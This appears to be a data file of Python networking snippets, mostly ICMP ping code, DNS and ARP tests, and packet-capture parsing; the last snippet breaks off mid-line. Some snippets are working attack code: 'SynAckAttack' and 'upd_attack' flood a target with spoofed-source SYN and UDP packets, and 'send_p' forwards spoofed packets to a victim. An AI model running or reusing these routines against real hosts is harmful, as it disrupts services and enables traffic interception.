intf=None):\n self.one_ipv4_ping(\n src_host, dst_ip, require_host_learned=False, retries=5, timeout=1000, intf=intf)", "def test_udp_bad_server():\n assert dnsck_query(\"8.8.8.88\", \"google.com\", \"A\", 1) == 1", "def do(self):\n from sys import exc_info\n try: # One could use UDP here, but it's obscure\n current_socket = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.getprotobyname(\"icmp\"))\n except socket.error, (errno, msg):\n if errno == 1:\n # Operation not permitted - Add more information to traceback\n etype, evalue, etb = exc_info()\n evalue = etype(\n \"%s - Note that ICMP messages can only be send from processes running as root.\" % evalue\n )\n raise etype, evalue, etb\n raise # raise the original error\n self.seq_number += 1\n send_time = self.send_one_ping(current_socket)\n if send_time == None:\n return\n\n receive_time, packet_size, ip, ip_header, icmp_header = self.receive_one_ping(current_socket)\n current_socket.close()\n\n if receive_time:\n return (receive_time - send_time) * 1000.0", "def receive_ping(my_socket, timeout):\n start_time = timeout\n while True:\n start_select = time.process_time()\n # select.select(rlist, wlist, xlist[, timeout])\n # wait until ready for read / write / exceptional condition\n # The return value is a triple of lists\n what_ready = select.select([my_socket], [], [], start_time)\n how_long = (time.process_time() - start_select)\n if what_ready[0] == []: #timeout\n return\n\n time_received = time.process_time()\n # socket.recvfrom(bufsize[, flags])\n # The return value is a pair (string, address)\n rec_packet, addr = my_socket.recvfrom(1024)\n icmp_header = rec_packet[20 : 28]\n icmp_buff= rec_packet[28 : ]\n ip_type, code, checksum, packet_ID, sequence = struct.unpack(\"bbHHh\", icmp_header)\n #if ip_type != 8 and packet_ID == ID: # ip_type should be 0\n if ip_type != 8: # ip_type should be 0\n byte_in_double = struct.calcsize(\"d\")\n time_sent = struct.unpack(\"d\", rec_packet[28 : 28 + byte_in_double])[0]\n return time_received - time_sent\n else:\n print('Got icmp:')\n print(icmp_buff)\n return timeout\n start_time = start_time - how_long\n if start_time <= 0:\n return", "def ping(self,dest):\n\t\tself.tn.write('ping -c 4 %s\\n'%(dest))\n\t\tself.tn.write('exit\\n')\n\t\tresp = self.tn.read_all()\n\t\treturn resp", "def tcpdump(timeout, q, interface):\t\n\tlogging.debug('tcpdump -s 1024 -lqnAt tcp port 80 -i eth0')\n\t# tcpdump -s 1024 -lqnAt tcp port 80\n\t\t\n\tcommand = Command(['/usr/sbin/tcpdump', '-s 1024', '-lnAq', '-i', interface], timeout)\n\tcommand.run()\n\n\t# when it's executing here, the results have been available\n\t# print command.out\n\n\tif command.out is not None:\n\t\t# pattern = \"time=([0-9]+\\.[0-9]+) ms\"\n\t\tip_pattern = \"IP ([0-9]+.[0-9]+.[0-9]+.[0-9]+).[0-9]+ > [0-9]+.[0-9]+.[0-9]+.[0-9]+.[0-9]\"\n\t\tgoogle_pattern = \"domain=.google.com\"\n\t\tlines = command.out.split('\\n')\n\t\tlast_ip = None\n\n\t\t# first time scan for google's return ip\n\t\tfor line in lines:\n\t\t\tip_src = re.search(ip_pattern, line)\n\t\t\tif ip_src is not None:\n\t\t\t\tlast_ip = ip_src.group(1)\n\t\t\tif re.search(google_pattern, line):\n\t\t\t\tprint last_ip\n\t\t\t\tbreak\n\n\t\tgEntries = []\n\t\tif last_ip is not None:\n\t\t\t\n\t\t\t# second time scan parse tcpdump for query entries\n\t\t\tfor line in lines:\n\t\t\t\tlast_ip_pos = re.search(last_ip, line)\n\t\t\t\tif last_ip_pos is None:\n\t\t\t\t\tcontinue\n\t\t\t\n\t\t\t\tif line.index('>') > last_ip_pos.start():\n\t\t\t\t\t# from remote to this place\n\t\t\t\t\ttraffic_type = 1\t\t\t\n\t\t\t\telse:\n\t\t\t\t\t# out to remote\n\t\t\t\t\ttraffic_type = 0\n\t\t\t\n\t\t\t\ttime_pattern = \"([0-9]+:[0-9]+:[0-9]+.[0-9]+) IP\"\n\t\t\t\ttimestamp = re.search(time_pattern, line)\n\t\t\t\tif timestamp is not None:\n\t\t\t\t\ttime_str = timestamp.group(1)\n\t\t\t\t\th, m, s, ms = map(int, re.split(r'[.:]+', time_str))\n\t\t\t\t\ttimestamp_delta = timedelta(hours=h, minutes=m, seconds=s, microseconds=ms)\n\t\t\t\t\tgEntries.append( (timestamp_delta, traffic_type) )\n\t\t\t\telse:\n\t\t\t\t\tgEntries.append( (None, -1))\n\n\t\tq.put((command.returncode, last_ip, gEntries))\n\t\treturn", "def send_p():\n while 1:\n if PACKET_QUEUE:\n mpkt = PACKET_QUEUE.pop()\n sendp(mpkt, iface=IFACE, loop=0) # forward spoofed packet to the victim", "def test_udp_query():\n assert dnsck_query(\"8.8.8.8\", \"google.com\", \"a\", 1) == 0", "def test_nmap_icmp_echo_request(self):\n assert_equal(self.test_nmap.ICMP_ECHO_REQUEST, 8)", "def adjust_ether (self, ip=None, ether=None):\n# The rules are:\n# 1. send to the group mac address address corresponding to the IP.dst\n if ip != None and ip.haslayer(IP) and ether != None and ether.haslayer(Ether):\n iplong = atol(ip.dst)\n ether.dst = \"01:00:5e:%02x:%02x:%02x\" % ( (iplong>>16)&0x7F, (iplong>>8)&0xFF, (iplong)&0xFF )\n # print \"igmpize ip \" + ip.dst + \" as mac \" + ether.dst \n return True\n else:\n return False", "def test_ignore_non_arp_packets(self):\n packet = IP(dst='www.apple.com') / TCP(dport=80) / Raw(b'test')\n\n chef = ARPChef()\n dumpling = chef.packet_handler(packet)\n\n assert chef.ip_mac == {}\n assert dumpling is None", "def SynAckAttack(host, cmds):\n\tprint(\"\\n###########################################\")\n\tprint(\"# Starting SYN ACK Attack..\")\n\tprint(\"###########################################\\n\")\n\t# ports=[]\n\ttry:\n\t\tamount = int(cmds[3])\n\texcept IndexError:\n\t\tamount = 1\n\ttry:\n\t\tports = cmds[2]\n\t\tports = [int(p) for p in ports.split('.')]\n\texcept IndexError:\n\t\tports = []\n\n\t# hosts = state.host_and_ports.keys()\n\t# ports = []\n\tif not ports:\n\t\tprint(\"***\\n[e]: No ports were specifed, please enter them like so: 80,81,88,3000\")\n\t\tprint(\"[cmds]: \", cmds)\n\t\tprint()\n\t\treturn\n\ttry:\n\t\t\t# for host in hosts:\n\t#\tprint(f\"# Attacking Target: {host}\")\n\t\tfor hostPort in ports:\n\t\t\tfor x in range(0, amount):\n\t\t\t\t# Build a random packet\n\t\t\t\ts_port = randInt()\n\t\t\t\ts_eq = randInt()\n\t\t\t\tw_indow = randInt()\n\n\t\t\t\tIP_Packet = IP()\n\t\t\t\tIP_Packet.src = randomIP()\n\t\t\t\tIP_Packet.dst = host\n\n\t\t\t\tTCP_Packet = TCP()\n\t\t\t\tTCP_Packet.sport = s_port\n\t\t\t\tTCP_Packet.dport = hostPort\n\t\t\t\tTCP_Packet.flags = \"S\"\n\t\t\t\tTCP_Packet.seq = s_eq\n\t\t\t\tTCP_Packet.window = w_indow\n\n\t\t\t\t# Send the packet\n\t\t\t\tsend(IP_Packet/TCP_Packet)\n\t\tprint()\n\t\tprint('***')\n\t\tprint(\"packets explanation:\")\n\t\tprint(\"sent %s packets of this form: \" % amount)\n\t\tIP_Packet.show()\n\t\tprint(\"ihl: internet header length\")\n\t\tprint(\"tos: type of service\")\n\t\tprint(\"frag: fragement offset\")\n\t\tprint(\"ttl: time to live [s]\")\n\t\tprint(\"proto: Protocol num, 0 = IPv6\")\n\t\tprint(\"chksum: check sum for error checking\")\n\t\tprint(\"***\")\n\t\tprint('TCP SYN packet: ')\n\t\tTCP_Packet.show()\n\t\tprint(\"sport: identifies sending port\")\n\t\tprint(\"dport: identifies receiving port\")\n\t\tprint(\"seq: seqence number. Dual role. If SYN flag is set (1), it's initial seqence number.\")\n\t\tprint(\" if flag is clear (0) this is accumulated seqence number for current session.\")\n\t\tprint(\"ack: ack number. If ACK flag set then this value is what sender of ACK expects to get back\")\n\t\tprint(\"dataofs: specifies the size of the TCP header in 32-bit words\")\n\t\tprint(\"flags: there are 9 1-bit flags\")\n\t\tprint(\"window: size of data windows sender of segment willing to receive back\")\n\t\tprint(\"chksum: error checking checksum\")\n\t\tprint(\"urgptr: position offset from the seqence number of last urgent data byte.\")\n\t\t# get grasp of all flags set in the Scapy TCP packet\n\t\t# obv, it's going to just be SYN, set with 'S'\n\t\tflags_vals = {\n\t\t\t'F': 0,\n\t\t\t'S': 0,\n\t\t\t'R': 0,\n\t\t\t'P': 0,\n\t\t\t'A': 0,\n\t\t\t'U': 0,\n\t\t\t'E': 0,\n\t\t\t'C': 0,\n\t\t}\n\t\tflags = {\n\t\t\t'F': 'FIN',\n\t\t\t'S': 'SYN',\n\t\t\t'R': 'RST',\n\t\t\t'P': 'PSH',\n\t\t\t'A': 'ACK',\n\t\t\t'U': 'URG',\n\t\t\t'E': 'ECE',\n\t\t\t'C': 'CWR',\n\t\t\t}\n\t\tfor f in TCP_Packet.sprintf('%TCP.flags%'):\n\t\t\tflags_vals[f] = 1\n\t\tprint('flags set in TCP SYN packet')\n\t\tprint([flags[x] for x in TCP_Packet.sprintf('%TCP.flags%')])\n\t\tprint(flags_vals)\n\texcept Exception as e:\n\t\tprint('in ping flood: ')\n\t\tprint('something was wrong with arguments: ', cmds)\n\t\tprint('\\n', e)\n\t\treturn", "def receive_one_ping(mySocket, myID, timeout):\n timeLeft = timeout/1000\n\n while True: # Loop enquanto aguarda o pacote ou o timeout \n startedSelect = default_timer() # Essa função retorna o tempo de espera junto com o tempo da CPU e depende da plataforma. \n\n whatReady = select.select([mySocket], [], [], timeLeft)\n howLongInSelect = (default_timer() - startedSelect)\n if whatReady[0] == []: # timeout\n return None, 0, 0, 0, 0\n\n timeReceived = default_timer() # Essa função retorna o tempo de espera junto com o tempo da CPU e depende da plataforma. \n\n \"\"\"\n Receba dados do soquete. O valor de retorno é um par (bytes, endereço) em que bytes é um objeto de bytes que representa\n os dados recebidos e endereço é o endereço do soquete que envia os dados \n \"\"\"\n recPacket, addr = mySocket.recvfrom(ICMP_MAX_RECV) \n\n \"\"\"\n struct.unpack( fmt , string ) \n Descompacte a sequência (presumivelmente empacotada por ) de acordo com o formato fornecido. \n O resultado é uma tupla, mesmo que contenha exatamente um item.\n \"\"\"\n ipHeader = recPacket[:20]\n iphVersion, iphTypeOfSvc, iphLength, \\\n iphID, iphFlags, iphTTL, iphProtocol, \\\n iphChecksum, iphSrcIP, iphDestIP = struct.unpack(\n \"!BBHHHBBHII\", ipHeader\n )\n\n icmpHeader = recPacket[20:28]\n icmpType, icmpCode, icmpChecksum, \\\n icmpPacketID, icmpSeqNumber = struct.unpack(\n \"!BBHHH\", icmpHeader\n )\n\n if icmpPacketID == myID:\n dataSize = len(recPacket) - 28\n # retorna o tempo de resposta, o tamanho dado, o ping pingado, o numero de seq, id e timeout \n return timeReceived, (dataSize+8), iphSrcIP, icmpSeqNumber, iphTTL\n\n timeLeft = timeLeft - howLongInSelect\n if timeLeft <= 0:\n return None, 0, 0, 0, 0 # retorna nada ", "def recv(sock: socket.socket, dest: io.BufferedIOBase) -> int:\r\n pktsRecv = []\r\n acksSent = []\r\n pause = .1\r\n num_bytes = 0\r\n while True:\r\n # Receive packets\r\n data = sock.recv(util.MAX_PACKET)\r\n if not data:\r\n break\r\n message, seq_num = getInfo(data)\r\n print(\"***********************************************************\")\r\n print(\"Received sequence number:\" , seq_num)\r\n # Create and send acks\r\n ack_num = int(seq_num) + len(message)\r\n ack = ack_num.to_bytes(3, \"big\")\r\n print(\"Sending ack:\", ack_num)\r\n if ack_num not in acksSent:\r\n dest.write(bytes(str.encode(message)))\r\n dest.flush()\r\n acksSent.append(ack_num)\r\n pktsRecv.append(bytes(str.encode(message)))\r\n sock.send(ack)\r\n num_bytes += len(message)\r\n return num_bytes", "def test_notice_replier_should_have_saved_request_ip_mac(arp):\n\n # Sender of this reply should have saved the src MAC and src IP of the request\n e = Ether(src='00:11:22:aa:bb:cd', dst='00:11:22:aa:bb:ca')\n a = ARP(hwsrc='00:11:22:aa:bb:cd', hwdst='00:11:22:aa:bb:ca', psrc='10.0.0.1', pdst='10.0.0.2', op='is-at')\n response = arp.receive_packet(e / a)\n assert type(response) is PermittedResponse\n\n # Sender of previous reply should not do a new request\n e = Ether(src='00:11:22:aa:bb:cd', dst='ff:ff:ff:ff:ff:ff')\n a = ARP(hwsrc='00:11:22:aa:bb:cd', hwdst='00:00:00:00:00:00', psrc='10.0.0.1', pdst='10.0.0.2', op='who-has')\n arp.receive_packet(e / a)\n response = arp.receive_packet(e / a)\n\n assert type(response) is NoticeRespone", "def process_pkt_from_client(ts_delta, acks, nb_acks, connections, tcp, ip, saddr, daddr, sport, dport, fin_flag):\n if acks[saddr, sport, daddr, dport][co.S2C] >= 0:\n conn_id = acks[saddr, sport, daddr, dport][co.CONN_ID]\n connections[conn_id].flow.attr[co.S2C][co.TIME_LAST_ACK_TCP] = ts_delta\n if fin_flag:\n connections[conn_id].flow.attr[co.S2C][co.TIME_FIN_ACK_TCP] = ts_delta\n\n bytes_acked = (tcp.ack - acks[saddr, sport, daddr, dport][co.S2C]) % 4294967296\n if bytes_acked >= 2000000000:\n # Ack of 2GB or more is just not possible here\n return\n\n increment_value_dict(nb_acks[co.S2C][conn_id], bytes_acked)\n size_payload = ip.len - ip.hl * 4 - tcp.off * 4\n\n # If SOCKS command\n if size_payload == 7 and connections[conn_id].attr.get(co.SOCKS_PORT, None) is None:\n crypted_socks_cmd = tcp.data\n # This is possible because of packet stripping\n if len(crypted_socks_cmd) == 7:\n decrypted_socks_cmd = socks_parser.decode(crypted_socks_cmd)\n if decrypted_socks_cmd[0] == b'\\x01': # Connect\n connections[conn_id].attr[co.SOCKS_DADDR] = socks_parser.get_ip_address(decrypted_socks_cmd)\n connections[conn_id].attr[co.SOCKS_PORT] = socks_parser.get_port_number(decrypted_socks_cmd)\n\n if size_payload > 0 and tcp.seq in acks[saddr, sport, daddr, dport][SEQ_C2S]:\n # This is a retransmission! (take into account the seq overflow)\n connections[conn_id].flow.attr[co.C2S][co.TIME_LAST_PAYLD_WITH_RETRANS_TCP] = ts_delta\n connections[conn_id].flow.attr[co.C2S][co.TIMESTAMP_RETRANS].append((ts_delta,\n ts_delta - acks[saddr, sport, daddr, dport][HSEQ_C2S][tcp.seq][0],\n ts_delta - acks[saddr, sport, daddr, dport][HSEQ_C2S][tcp.seq][1],\n ts_delta - acks[saddr, sport, daddr, dport][co.TIMESTAMP][CLIENT]))\n acks[saddr, sport, daddr, dport][HSEQ_C2S][tcp.seq][1] = ts_delta\n elif size_payload > 0:\n acks[saddr, sport, daddr, dport][SEQ_C2S].add(tcp.seq)\n connections[conn_id].flow.attr[co.C2S][co.TIME_LAST_PAYLD_WITH_RETRANS_TCP] = ts_delta\n connections[conn_id].flow.attr[co.C2S][co.TIME_LAST_PAYLD_TCP] = ts_delta\n acks[saddr, sport, daddr, dport][HSEQ_C2S][tcp.seq] = [ts_delta, ts_delta]\n # Don't think will face this issue\n# if len(acks[saddr, sport, daddr, dport][SEQ][co.C2S]) >= 3000000:\n# for x in range(50000):\n# acks[saddr, sport, daddr, dport][SEQ][co.C2S].popleft()\n\n acks[saddr, sport, daddr, dport][co.S2C] = tcp.ack\n acks[saddr, sport, daddr, dport][co.TIMESTAMP][CLIENT] = ts_delta", "def onPing(self, payload):", "def send_ping(self, seq_num):\n # Create a client socket, bind to random port, and set timeout of sock\n client_sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n rand_port = random.randint(1024, 65535)\n host = socket.gethostbyname(socket.gethostname())\n client_sock.bind((host, rand_port))\n client_sock.settimeout(self.timeout)\n\n # If first request, print relevant message\n if seq_num == 1:\n print(f'PING {self.server_ip}')\n # Try - send ping request to server\n try:\n # build request message\n request_msg = self.build_message(seq_num)\n\n # Mark start time for calculating request message rtt (ms)\n start_time = time.time() * 1000\n # Send echo request message to server and receive any reply\n client_sock.sendto(request_msg, (self.server_ip, self.server_port))\n data, address = client_sock.recvfrom(2048)\n # Mark end time for calculating rtt (ms)\n end_time = time.time() * 1000\n\n # Add rtt to list of rtts\n rtt = int(end_time - start_time)\n self.rtt_list.append(rtt)\n # Increment request count since transmitted another message\n self.request_count += 1\n\n # Calculate checksum from server\n server_checksum = self.calculate_checksum(data)\n # Grab sequence number from reply message\n server_seq_num = int.from_bytes(data[6:8], byteorder='big')\n\n # If checksum from server reply is invalid, print error message\n # (invalid if sum of headers not = 65535 (all 1's in binary))\n if server_checksum != 65535:\n print(f'WARNING: checksum verification failure for echo reply '\n f'seqno={str(server_seq_num)}')\n # Otherwise print PONG\n else:\n print(f'PONG {self.server_ip}: seq={str(server_seq_num)} '\n f'time={rtt} ms')\n # Successfully received a reply\n self.reply_count += 1\n client_sock.close()\n\n # If have timeout exception, count as dropped\n except socket.timeout:\n self.request_count += 1\n client_sock.close()", "def _tcp_reassemble(self, number, src_addr, dst_addr, tcp):\n \n pld = tcp.message[tcp.header_len : tcp.header_len + tcp.segement_len]\n src_socket = (src_addr, tcp.src_port)\n dst_socket = (dst_addr, tcp.dst_port)\n sockets = (src_socket, dst_socket)\n\n def debug_cond(tcp):\n return False\n return True\n return tcp.stream_index == 710\n\n #check the other side of the tcp connection, flush the complete pdu to the msg_list\n if sockets in _tcp_buf and tcp.ack_num != _tcp_buf[sockets].ack: \n self._tcp_flush(sockets)\n del _tcp_buf[sockets]\n if debug_cond(tcp):\n print \"get a new http, decide by %d\" % number\n\n if debug_cond(tcp):\n print \"_tcp_reassemble, number= %d, sequence_num=%d, ack = %d, pldlen=%d, msglen=%d, opt_paddings=%d, iptotal_len=%d, ipheader_len=%d, tcpheader_len=%d\" % (number, tcp.ack_num, len(pld), len(tcp.message), len(tcp.opt_paddings), tcp.ip.total_len, tcp.ip.header_len, tcp.header_len)\n pass\n\n if pld:\n if not sockets in _tcp_buf:\n if debug_cond(tcp):\n print \" add a new message, begin with %d\" % number\n _tcp_buf[sockets] = Message({\n 'pcap_num_list': [],\n 'ts': self.packet_headers[number]['ts'] - self._ts_base,\n 'ip_proto': 'TCP',\n 'src_addr': src_addr,\n 'dst_addr': dst_addr,\n 'src_port': tcp.src_port,\n 'dst_port': tcp.dst_port,\n #'seq': tcp.sequence_num, HUA tcp disorder will generate error\n 'tcp_list': [],\n 'seq_min': 0,\n 'ack': tcp.ack_num,\n 'payload': [],\n 'stream_index': tcp.stream_index, # HUA add a stream index to message\n 'direction': tcp.direction, # HUA add to determin the http is request or response\n 'flag': False\n })\n try:\n _tcp_buf[sockets].ts = self.packet_headers[number]['ts'] - self._ts_base # HUA we should update ts and set it to last\n except:\n print number\n print len(self.packet_headers)\n _tcp_buf[sockets].pcap_num_list.append(number)\n if number == 2246:\n _tcp_buf[sockets].flag = False\n _tcp_buf[sockets].tcp_list.append(tcp)\n #offset = tcp.sequence_num - _tcp_buf[sockets].seq # seq 是相对的\n #_tcp_buf[sockets].payload[offset:offset+len(pld)] = list(pld)", "def ping(worker,count=4):\n ip=worker[1]\n \n ping = subprocess.Popen(\n [\"ping\", \"-c\", str(count), str(ip)],\n stdout = subprocess.PIPE,\n stderr = subprocess.PIPE\n )\n \n out, error = ping.communicate()\n \n #if anything is wrong stdout will be blank, therefore failure\n if len(out)==0:\n return False\n \n #search for packet loss and return the percentage\n return int(re.search(\"(\\d*)\\% packet loss\",out).group(1))!=100", "def arp_forwarding(self, msg, src_ip, dst_ip):\r\n datapath = msg.datapath\r\n ofproto = datapath.ofproto\r\n\r\n result = self.awareness.get_host_location(dst_ip)\r\n if result:\r\n # Host has been recorded in access table.\r\n datapath_dst, out_port = result[0], result[1]\r\n datapath = self.datapaths[datapath_dst]\r\n out = self._build_packet_out(datapath, ofproto.OFP_NO_BUFFER,\r\n ofproto.OFPP_CONTROLLER,\r\n out_port, msg.data)\r\n datapath.send_msg(out)\r\n self.logger.debug(\"Deliver ARP packet to knew host\")\r\n else:\r\n # Flood is not good.\r\n self.flood(msg)", "def receive_one_ping(my_socket, id, timeout):\n time_left = timeout\n while True:\n started_select = time.time()\n what_ready = select.select([my_socket], [], [], time_left)\n how_long_in_select = (time.time() - started_select)\n if what_ready[0] == []: # Timeout\n return\n\n time_received = time.time()\n rec_packet, addr = my_socket.recvfrom(1024)\n icmp_header = rec_packet[20:28]\n icmp_type, code, checksum, packet_id, sequence = struct.unpack(\n \"bbHHh\", icmp_header\n )\n # Filters out the echo request itself. \n # This can be tested by pinging 127.0.0.1 \n # You'll see your own request\n if icmp_type != 8 and packet_id == id:\n bytes_in_double = struct.calcsize(\"d\")\n time_sent = struct.unpack(\"d\", rec_packet[28:28 + bytes_in_double])[0]\n return time_received - time_sent\n\n time_left = time_left - how_long_in_select\n if time_left <= 0:\n return", "def ping(msg):\n return msg", "def forward(self, srcip, packet): #gets entire packet and srcip of that packet\n # get route to send packet\n best_route = self.get_route(srcip, packet[DEST]) #is a socket\n\n sock = best_route\n\n\n jsonpack = json.dumps(packet)\n sock.sendall(jsonpack.encode())\n # TODO fix src and dest\n return True", "def process_mptcp_syn_ack(ts_delta, acks, conn_acks, mptcp_connections, tcp, ip, saddr, daddr, sport, dport, black_list, fast_conns, ts_syn_timeout, ts_timeout):\n # The sender of the SYN/ACK is the server\n if (daddr, dport, saddr, sport) in acks and ((ts_delta - acks[daddr, dport, saddr, sport][co.TIMESTAMP][CLIENT]).total_seconds() < ts_timeout\n and acks[daddr, dport, saddr, sport][co.C2S] == -1):\n # Better to check, if not seen, maybe uncomplete TCP connection\n acks[daddr, dport, saddr, sport][co.C2S] = tcp.ack\n acks[daddr, dport, saddr, sport][co.TIMESTAMP][SERVER] = ts_delta\n conn_acks[acks[daddr, dport, saddr, sport][co.CONN_ID]][co.TIMESTAMP][SERVER] = ts_delta\n\n elif (daddr, dport, saddr, sport) in acks and ((ts_delta - acks[daddr, dport, saddr, sport][co.TIMESTAMP][CLIENT]).total_seconds() < ts_timeout\n and tcp.ack == acks[daddr, dport, saddr, sport][co.C2S]):\n # SYN/ACK retransmission! But don't do anything special\n acks[daddr, dport, saddr, sport][co.TIMESTAMP][SERVER] = ts_delta\n conn_acks[acks[daddr, dport, saddr, sport][co.CONN_ID]][co.TIMESTAMP][SERVER] = ts_delta", "def test_udp_alt_rectype():\n cmd = [\n \"python\",\n \"dnsck/dnsck.py\",\n \"-s\",\n \"8.8.8.8\",\n \"google.com\",\n \"-t\",\n \"txt\",\n \"-i\",\n \"1\",\n ]\n process = subprocess.run(cmd, shell=False, check=True)\n assert process.returncode == 0", "def process_pkt_from_server(ts_delta, acks, nb_acks, connections, tcp, ip, saddr, daddr, sport, dport, fin_flag):\n if acks[daddr, dport, saddr, sport][co.C2S] >= 0:\n conn_id = acks[daddr, dport, saddr, sport][co.CONN_ID]\n connections[conn_id].flow.attr[co.C2S][co.TIME_LAST_ACK_TCP] = ts_delta\n if fin_flag:\n connections[conn_id].flow.attr[co.C2S][co.TIME_FIN_ACK_TCP] = ts_delta\n\n bytes_acked = (tcp.ack - acks[daddr, dport, saddr, sport][co.C2S]) % 4294967296\n if bytes_acked >= 2000000000:\n # Ack of 2GB or more is just not possible here\n return\n\n increment_value_dict(nb_acks[co.C2S][conn_id], bytes_acked)\n size_payload = ip.len - ip.hl * 4 - tcp.off * 4\n\n if size_payload > 0 and tcp.seq in acks[daddr, dport, saddr, sport][SEQ_S2C]:\n # This is a retransmission!\n connections[conn_id].flow.attr[co.S2C][co.TIME_LAST_PAYLD_WITH_RETRANS_TCP] = ts_delta\n connections[conn_id].flow.attr[co.S2C][co.TIMESTAMP_RETRANS].append((ts_delta,\n ts_delta - acks[daddr, dport, saddr, sport][HSEQ_S2C][tcp.seq][0],\n ts_delta - acks[daddr, dport, saddr, sport][HSEQ_S2C][tcp.seq][1],\n ts_delta - acks[daddr, dport, saddr, sport][co.TIMESTAMP][SERVER]))\n acks[daddr, dport, saddr, sport][HSEQ_S2C][tcp.seq][1] = ts_delta\n elif size_payload > 0:\n acks[daddr, dport, saddr, sport][SEQ_S2C].add(tcp.seq)\n connections[conn_id].flow.attr[co.S2C][co.TIME_LAST_PAYLD_WITH_RETRANS_TCP] = ts_delta\n connections[conn_id].flow.attr[co.S2C][co.TIME_LAST_PAYLD_TCP] = ts_delta\n acks[daddr, dport, saddr, sport][HSEQ_S2C][tcp.seq] = [ts_delta, ts_delta]\n # Don't think will face this issue\n# if len(acks[daddr, dport, saddr, sport][SEQ][co.S2C]) >= 3000000:\n# for x in range(50000):\n# acks[daddr, dport, saddr, sport][SEQ][co.S2C].popleft()\n\n acks[daddr, dport, saddr, sport][co.C2S] = tcp.ack\n acks[daddr, dport, saddr, sport][co.TIMESTAMP][SERVER] = ts_delta", "def sendPing(self, payload=None):", "def test_udp_alt_iteration():\n cmd = [\"python\", \"dnsck/dnsck.py\", \"-s\", \"8.8.8.8\", \"google.com\", \"-i\", \"1\"]\n process = subprocess.run(cmd, shell=False, check=True)\n assert process.returncode == 0", "def test_udp_no_records():\n assert dnsck_query(\"8.8.8.8\", \"test.google.com\", \"A\", 1) == 0", "def test_notice_on_double_request(arp):\n\n e = Ether(src='00:11:22:aa:bb:ca', dst='ff:ff:ff:ff:ff:ff')\n a = ARP(hwsrc='00:11:22:aa:bb:ca', hwdst='00:00:00:00:00:00', psrc='10.0.0.2', pdst='10.0.0.1', op='who-has')\n\n response = arp.receive_packet(e / a)\n assert type(response) is PermittedResponse\n\n response = arp.receive_packet(e / a)\n assert type(response) is NoticeRespone", "def ping(self, ip):\n res = self.cli('ping ' + ip)\n # '8 bytes from fdde:ad00:beef:0:0:ff:fe00:e000: icmp_seq=2 hlim=64 time=236ms\\r\\n'\n # 'Error 6: Parse\\r\\n'\n # no answer\n ret_time = -1\n try:\n ret_time = int(res.split('time=')[1].split('ms')[0])\n except Exception:\n pass\n return ret_time", "def icmp_probe(self, ip):\n\n\t\tcmd = 'ping %s -n 10' % ip\n\t\tp = Popen(cmd, shell=True, stdin=PIPE, stderr=PIPE, stdout=PIPE)\n\t\tres = p.stdout.read()\n\n\t\tres = res.decode()\n\t\tif len(p.stderr.read()) == 0:\n\t\t\tif 'Destination host unreachable' in res:\n\t\t\t\treturn False\n\t\t\treturn True\n\t\telse:\n\t\t\treturn False", "def upd_attack(host, cmds):\n\ttry:\n\t\tport = int(cmds[2])\n\t\tamount = 1\n\t\ttry: \n\t\t\tamount = int(cmds[3])\n\t\texcept IndexError as i:\n\t\t\tamount = 1\n\t\tfor i in range(0, amount):\n\t\t\tIP_Packet = IP()\n\t\t\tIP_Packet.src = randomIP()\n\t\t\tIP_Packet.dst = host\n\t\t\tsend(IP_Packet/UDP(dport=port))\n\t\tprint(\"sent %s UDP Packets\" % amount)\n\t\tprint(\"UDP Packet details:\")\n\t\tudp = UDP(dport=port)\n\t\tudp.show()\n\texcept Exception as e:\n\t\tprint('something went wrong in udp_attack ', e)\n\t\tprint('cmds: ', cmds)", "def test_udp_alt_rectype_and_iteration():\n cmd = [\n \"python\",\n \"dnsck/dnsck.py\",\n \"-s\",\n \"8.8.8.8\",\n \"google.com\",\n \"-t\",\n \"soa\",\n \"-i\",\n \"2\",\n ]\n process = subprocess.run(cmd, shell=False, check=True)\n assert process.returncode == 0", "def ping_once(sock, data_size=None, id=None):\n\n if data_size is None:\n data_size = 64\n \n if id is None:\n id = 1\n \n seq = 1999 # not really used here, but the TV show Space 1999! was pretty awesome when I was a kid.\n\n payload, packet = create_packet(id, seq, data_size)\n\n try:\n # Send it, record the time.\n sock.sendall(packet)\n time_send = now()\n\n # Receive response, record time.\n msg_recv = sock.recv(0xffff)\n time_recv = now()\n\n # Extract packet data.\n ip = dpkt.ip.IP(msg_recv)\n\n # Process results.\n is_same_data = (payload == ip.icmp.echo.data)\n time_ping = (time_recv - time_send)\n echo_id = ip.icmp.echo.id\n\n except socket.timeout:\n is_same_data = False\n time_ping = None\n echo_id = None\n\n # Done.\n result = {'time_ping':time_ping,\n 'data_size':data_size,\n 'timeout':sock.gettimeout()*1000., # convert from seconds to milliseconds\n 'is_same_data':is_same_data,\n 'id':id,\n 'echo_id':echo_id}\n\n return result", "def change_ip(sender_socket, ip, port):\n sender_socket.sendto(bytes(\"change ip\", \"UTF-8\"), (ip, port))\n new_ip_str = input(\"New Host IP Address: \")\n sender_socket.sendto(bytes(new_ip_str, \"UTF-8\"), (ip, port))\n sleep(0.5)\n status = sender_socket.recv(BUFFER_SIZE)\n status_message = status.decode(\"UTF-8\")\n if \"IP Address Successfully Changed\" in status_message:\n print(status_message)\n return True\n else:\n print(status_message)\n return False", "def echo_reply_handler(self, ev):\n now_timestamp = time.time()\n try:\n latency = now_timestamp - eval(ev.msg.data)\n self.echo_latency[ev.msg.datapath.id] = latency\n except:\n return", "def gen_udp_pkt(src=None, dst=None, payload_len=-1):\n getipaddr = lambda addr: rand_ipaddr() if addr is None else addr\n sip = getipaddr(src)\n dip = getipaddr(dst)\n payload = get_payload(payload_len)\n pkt = fuzz(IP(src=sip, dst=dip)/UDP())/payload\n # pkt.show2()\n # os.write(2, str(pkt))\n return str(pkt)", "def send_ping(my_socket, ip_addr, ID):\n ip = socket.gethostbyname(ip_addr)\n\n # Header is type (8), code (8), checksum (16), id (16), sequence (16)\n my_checksum = 0\n\n # Make a dummy heder with a 0 checksum\n # struct.pack(fmt, v1, v2, ...)\n # Return a string containing the values v1, v2, ... packed\n # according to the given format.\n # b:signed char, h:short 2, H:unsigned short 2\n header = struct.pack('bbHHh', ICMP_ECHO_REQUEST, 0, my_checksum, ID, 1)\n # struct.calcsize(fmt)\n # Return the size of the struct corresponding to the given format.\n byte_in_double = struct.calcsize(\"d\") # C type: double\n data = (192 - byte_in_double) * \"P\" # any char is OK, any length is OK\n data = struct.pack(\"d\", time.clock()) + data\n\n # Calculate the checksum on the data and the dummy header.\n my_checksum = get_checksum(header + data)\n\n # It's just easier to make up a new header than to stuff it into the dummy.\n # socket.htons(x)\n # Convert 16-bit positive integers from host to network byte 